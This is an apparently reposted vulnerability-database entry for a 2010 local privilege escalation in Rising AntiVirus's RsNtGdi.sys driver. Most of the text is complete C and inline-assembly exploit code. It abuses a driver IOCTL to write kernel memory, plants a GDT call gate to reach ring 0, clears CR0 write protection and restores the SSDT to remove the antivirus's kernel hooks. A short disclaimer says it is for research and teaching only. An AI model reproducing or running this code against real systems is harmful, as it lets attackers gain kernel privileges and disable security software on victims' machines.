Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit

This article from: http://www.sebug.net/vulndb/19016/

SSV ID: 19016

SEBUG-Appdir: 瑞星(Rising)

发布时间: 2010-01-28

信息提交: speeder (dlrow1991_at_ymail.com)

影响版本:
Rising AntiVirus 2008 / 2009 / 2010
漏洞描述:
RsNtGdi.sys not verify the Irp->UserBuffer address.
Exploit code will restore all of the kernel SSDT hook
<*参考
none
*>

测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#include "stdafx.h" #include "windows.h" #include <stdio.h> enum { SystemModuleInformation = 11 }; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; HANDLE g_RsGdiHandle = 0 ; void __stdcall WriteKVM(PVOID Address , ULONG Value) { ULONG ColorValue = Value ; ULONG btr ; ULONG ColorBuffer = 0 ; DeviceIoControl(g_RsGdiHandle , 0x83003C0B, &ColorValue , sizeof(ULONG), &ColorBuffer , sizeof(ULONG), &btr , 0 ); DeviceIoControl(g_RsGdiHandle , 0x83003C0B, &ColorValue , sizeof(ULONG), Address , sizeof(ULONG), &btr , 0 ); return ; } void AddCallGate() { ULONG Gdt_Addr; ULONG CallGateData[0x4]; ULONG Icount; __asm { push edx sgdt [esp-2] pop edx mov Gdt_Addr , edx } __asm { push 0xc3 push Gdt_Addr call WriteKVM mov eax,Gdt_Addr mov word ptr[CallGateData],ax shr eax,16 mov word ptr[CallGateData+6],ax mov dword ptr[CallGateData+2],0x0ec0003e8 mov dword ptr[CallGateData+8],0x0000ffff mov dword ptr[CallGateData+12],0x00cf9a00 xor eax,eax LoopWrite: mov edi,dword ptr CallGateData[eax] push edi mov edi,Gdt_Addr add edi,0x3e0 add edi,eax push edi mov Icount,eax call WriteKVM mov eax,Icount add eax , 0x4 cmp eax,0x10 jnz LoopWrite } return ; } void IntoR0(PVOID function) { WORD Callgt[3]; Callgt[0] = 0; Callgt[1] = 0; Callgt[2] = 0x3e3; __asm { call fword ptr[Callgt] mov eax,esp mov esp,[esp+4] push eax call function pop esp push offset ring3Ret retf ring3Ret: nop } return ; } #pragma pack(1) typedef struct _IDTR { SHORT IDTLimit; UINT IDTBase; }IDTR, *PIDTR, **PPIDTR; #pragma pack() ULONG g_RealSSDT = 0 ; ULONG ServiceNum = 0 ; ULONG OrgService [0x1000] ; ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva) { ULONG Offset = Rva, Limit; IMAGE_SECTION_HEADER *Img; WORD i; Img = IMAGE_FIRST_SECTION(NT); if (Rva < Img->PointerToRawData) return Rva; for (i = 0; i < NT->FileHeader.NumberOfSections; i++) { if (Img[i].SizeOfRawData) Limit = Img[i].SizeOfRawData; else Limit = Img[i].Misc.VirtualSize; if (Rva >= Img[i].VirtualAddress && Rva < (Img[i].VirtualAddress + Limit)) { if (Img[i].PointerToRawData != 0) { Offset -= Img[i].VirtualAddress; Offset += Img[i].PointerToRawData; } return Offset; } } return 0; } #define ibaseDD *(PDWORD)&ibase DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh) { PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase; if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE; *pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew]; if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE; *pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE)); *poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER)); if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE; *psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER)); return TRUE; } typedef struct { WORD offset:12; WORD type:4; } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY; #define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset))) DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase) { PIMAGE_FILE_HEADER pfh; PIMAGE_OPTIONAL_HEADER poh; PIMAGE_SECTION_HEADER psh; PIMAGE_BASE_RELOCATION pbr; PIMAGE_FIXUP_ENTRY pfe; DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable; BOOL bFirstChunk; GetHeaders((PCHAR)hModule,&pfh,&poh,&psh); if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) && (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) { pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule); bFirstChunk=TRUE; while (bFirstChunk || pbr->VirtualAddress) { bFirstChunk=FALSE; pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION)); for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) { if (pfe->type==IMAGE_REL_BASED_HIGHLOW) { dwFixups++; dwPointerRva=pbr->VirtualAddress+pfe->offset; dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase; if (dwPointsToRva==dwKSDT) { if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7) { dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase; *ImageBase = poh->ImageBase; return dwKiServiceTable; } } } } *(PDWORD)&pbr+=pbr->SizeOfBlock; } } return 0; } DWORD CR0Reg ; ULONG realssdt ; void InKerneProc() { __asm { cli mov eax, cr0 mov CR0Reg,eax and eax,0xFFFEFFFF mov cr0, eax } int i; for (i = 0; i < (int)ServiceNum; i++) { *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i]; } __asm { mov eax, CR0Reg mov cr0, eax sti } } int main(int argc, char* argv[]) { printf("Rising AntiVirus 2008 ~ 2010 /n" "Local Privilege Escalation Vulnerability Proof Of Concept Exploit/n 2010-1-27/n"); g_RsGdiHandle = CreateFile("////.//RSNTGDI" , 0, FILE_SHARE_READ | FILE_SHARE_WRITE , 0, OPEN_EXISTING , 0 , 0 ); if (g_RsGdiHandle == INVALID_HANDLE_VALUE) { return 0 ; } SYSTEM_MODULE_INFORMATION ModuleInfo ; // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address HMODULE hlib = GetModuleHandle("ntdll.dll"); PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation"); ULONG infosize = sizeof(ModuleInfo); __asm { push 0 push infosize lea eax , ModuleInfo push eax push 11 call pNtQuerySystemInformation } HMODULE KernelHandle ; LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength); // Load the kernel image specified KernelHandle = LoadLibrary(ntosname); if (KernelHandle == 0 ) { return 0 ; } ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable"); if (KeSSDT == 0 ) { return 0 ; } ULONG ImageBase = 0 ; ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase); if (KiSSDT == 0 ) { return 0 ; } KiSSDT += (ULONG)KernelHandle; ServiceNum = 0x11c ; ULONG i ; for (i = 0 ; i < ServiceNum ; i ++) { OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase; } realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base; SetThreadAffinityMask(GetCurrentThread () , 0 ) ; AddCallGate(); IntoR0(InKerneProc); return 0; }
SEBUG安全建议:
none
// sebug.net [2010-01-28]

From: http://www.sebug.net/vulndb/19016/

你可能感兴趣的:(struct,image,Module,File,header,2010)